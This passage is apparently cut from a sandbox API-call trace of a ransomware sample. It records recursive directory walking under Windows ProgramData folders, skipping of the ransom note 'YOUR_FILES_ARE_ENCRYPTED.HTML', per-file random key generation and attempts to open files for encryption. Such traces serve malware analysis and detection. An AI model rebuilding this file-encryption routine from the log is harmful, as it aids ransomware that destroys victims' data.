(normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.794] GetProcessHeap () returned 0x270000 [0169.794] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.794] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcba5b4a0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcba5b4a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba5b4a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.794] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0169.794] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.794] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcba5b4a0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcba5b4a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba5b4a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.794] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0169.794] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0169.795] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.795] GetProcessHeap () returned 0x270000 [0169.795] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0169.795] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb19b80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb19b80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Device Stage", cAlternateFileName="DEVICE~1")) returned 1 [0169.795] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage") returned 45 [0169.795] GetProcessHeap () returned 0x270000 [0169.795] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.796] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage" [0169.796] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\*" [0169.796] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb19b80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb19b80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.796] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb19b80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb19b80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.796] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbacd8c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbacd8c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Device", cAlternateFileName="")) returned 1 [0169.796] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device") returned 52 [0169.796] GetProcessHeap () returned 0x270000 [0169.796] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.796] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device" [0169.796] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*" [0169.796] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbacd8c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbacd8c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.796] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbacd8c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbacd8c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.796] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbacd8c0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbacd8c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbacd8c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.797] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 82 [0169.797] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.797] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbaa7760, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaa7760, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{113527a4-45d4-4b6f-b567-97838f1b04b0}", cAlternateFileName="{11352~1")) returned 1 [0169.797] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned 91 [0169.797] GetProcessHeap () returned 0x270000 [0169.797] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0169.797] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}" [0169.797] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*" [0169.797] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbaa7760, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaa7760, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0169.797] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbaa7760, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaa7760, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.797] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa825f5e7, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa825f5e7, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d7b99dc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x1fad1, dwReserved0=0x0, dwReserved1=0x60, cFileName="background.png", cAlternateFileName="")) returned 1 [0169.797] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png") returned 106 [0169.797] lstrcmpW (lpString1="background.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.797] PathFindExtensionW (pszPath="background.png") returned=".png" [0169.797] lstrlenW (lpString=".png") returned 4 [0169.797] PathFindExtensionW (pszPath="background.png") returned=".png" [0169.797] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0169.798] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.798] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1dad96bc, ftCreationTime.dwHighDateTime=0x1c9ea14, ftLastAccessTime.dwLowDateTime=0x1dad96bc, ftLastAccessTime.dwHighDateTime=0x1c9ea14, ftLastWriteTime.dwLowDateTime=0x1dad96bc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xb61, dwReserved0=0x0, dwReserved1=0x60, cFileName="behavior.xml", cAlternateFileName="")) returned 1 [0169.798] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml") returned 104 [0169.798] lstrcmpW (lpString1="behavior.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.798] PathFindExtensionW (pszPath="behavior.xml") returned=".xml" [0169.798] lstrlenW (lpString=".xml") returned 4 [0169.798] PathFindExtensionW (pszPath="behavior.xml") returned=".xml" [0169.798] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0169.798] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.798] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8285746, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa8285746, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d7dfb3c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xadc8, dwReserved0=0x0, dwReserved1=0x60, cFileName="device.png", cAlternateFileName="")) returned 1 [0169.798] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png") returned 102 [0169.798] lstrcmpW (lpString1="device.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.798] PathFindExtensionW (pszPath="device.png") returned=".png" [0169.798] lstrlenW (lpString=".png") returned 4 [0169.798] PathFindExtensionW (pszPath="device.png") returned=".png" [0169.798] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0169.798] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.799] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa82ab8a5, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa82ab8a5, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d8c437c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0x0, dwReserved1=0x60, cFileName="overlay.png", cAlternateFileName="")) returned 1 [0169.799] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png") returned 103 [0169.799] lstrcmpW (lpString1="overlay.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.799] PathFindExtensionW (pszPath="overlay.png") returned=".png" [0169.799] lstrlenW (lpString=".png") returned 4 [0169.799] PathFindExtensionW (pszPath="overlay.png") returned=".png" [0169.799] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0169.799] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.799] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa82d1a04, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa82d1a04, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d8c437c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x99d3, dwReserved0=0x0, dwReserved1=0x60, cFileName="superbar.png", cAlternateFileName="")) returned 1 [0169.799] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png") returned 104 [0169.799] lstrcmpW (lpString1="superbar.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.799] PathFindExtensionW (pszPath="superbar.png") returned=".png" [0169.799] lstrlenW (lpString=".png") returned 4 [0169.799] PathFindExtensionW (pszPath="superbar.png") returned=".png" [0169.799] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0169.799] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.800] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbaa7760, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbaa7760, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaa7760, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.800] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0169.800] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.800] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbaa7760, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbaa7760, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaa7760, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.800] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0169.800] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0169.800] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.800] GetProcessHeap () returned 0x270000 [0169.801] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0169.801] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbaa7760, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaa7760, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{8702d817-5aad-4674-9ef3-4d3decd87120}", cAlternateFileName="{8702D~1")) returned 1 [0169.801] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}") returned 91 [0169.801] GetProcessHeap () returned 0x270000 [0169.801] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0169.801] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}" [0169.801] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*" [0169.801] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbaa7760, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaa7760, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0169.801] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbaa7760, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaa7760, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.801] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a06b8bc, ftCreationTime.dwHighDateTime=0x1c9ea14, ftLastAccessTime.dwLowDateTime=0x2a06b8bc, ftLastAccessTime.dwHighDateTime=0x1c9ea14, ftLastWriteTime.dwLowDateTime=0x2a06b8bc, 